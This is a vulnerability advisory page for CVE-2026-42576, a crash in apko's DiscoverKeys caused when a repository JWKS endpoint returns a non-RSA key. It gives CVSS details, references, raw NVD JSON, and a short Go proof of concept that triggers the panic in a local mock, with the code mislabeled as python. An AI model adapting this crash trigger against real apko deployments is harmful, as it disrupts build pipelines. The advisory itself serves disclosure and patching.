CVE-2026-42576

Description

apko allows users to build and publish OCI container images built from apk packages. Prior to version 1.2.7, DiscoverKeys in pkg/apk/apk/implementation.go unconditionally type-asserts JWKS keys as *rsa.PublicKey without checking the key type. If a repository JWKS endpoint returns a non-RSA key (e.g. EC), the unchecked assertion panics and crashes apko. This affects any workflow that initializes the APK database and fetches repository keys. This issue has been patched in version 1.2.7.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

apko < 1.2.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/rsa"
	"fmt"
)

// Simulate the vulnerable DiscoverKeys function
func vulnerableDiscoverKeys(key interface{}) {
	// Vulnerability: Unconditional type assertion to *rsa.PublicKey
	rsaKey := key.(*rsa.PublicKey) 
	fmt.Println("RSA Key found:", rsaKey)
}

func main() {
	// Generate an ECDSA key to simulate a non-RSA key from JWKS
	privKey, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	ecPubKey := &privKey.PublicKey

	fmt.Println("Attempting to process EC key as RSA key...")

	// Recover from panic to demonstrate the crash
	defer func() {
		if r := recover(); r != nil {
			fmt.Println("[PoC Result] Panic triggered (DoS successful):", r)
		}
	}()

	// Trigger the vulnerability by passing an EC key to the function expecting RSA
	vulnerableDiscoverKeys(ecPubKey)
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42576
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42576
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42576/
[4] VulDB https://vuldb.com/cve/CVE-2026-42576
[5] https://github.com/chainguard-dev/apko/commit/6604826b19e36e9bc6e196592800fad93738f4a1
[6] https://github.com/chainguard-dev/apko/releases/tag/v1.2.7
[7] https://github.com/chainguard-dev/apko/security/advisories/GHSA-m7hm-vm4x-28jf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42576", "sourceIdentifier": "[email protected]", "published": "2026-05-09T20:16:29.717", "lastModified": "2026-05-09T20:16:29.717", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "apko allows users to build and publish OCI container images built from apk packages. Prior to version 1.2.7, DiscoverKeys in pkg/apk/apk/implementation.go unconditionally type-asserts JWKS keys as *rsa.PublicKey without checking the key type. If a repository JWKS endpoint returns a non-RSA key (e.g. EC), the unchecked assertion panics and crashes apko. This affects any workflow that initializes the APK database and fetches repository keys. This issue has been patched in version 1.2.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-704"}]}], "references": [{"url": "https://github.com/chainguard-dev/apko/commit/6604826b19e36e9bc6e196592800fad93738f4a1", "source": "[email protected]"}, {"url": "https://github.com/chainguard-dev/apko/releases/tag/v1.2.7", "source": "[email protected]"}, {"url": "https://github.com/chainguard-dev/apko/security/advisories/GHSA-m7hm-vm4x-28jf", "source": "[email protected]"}]}}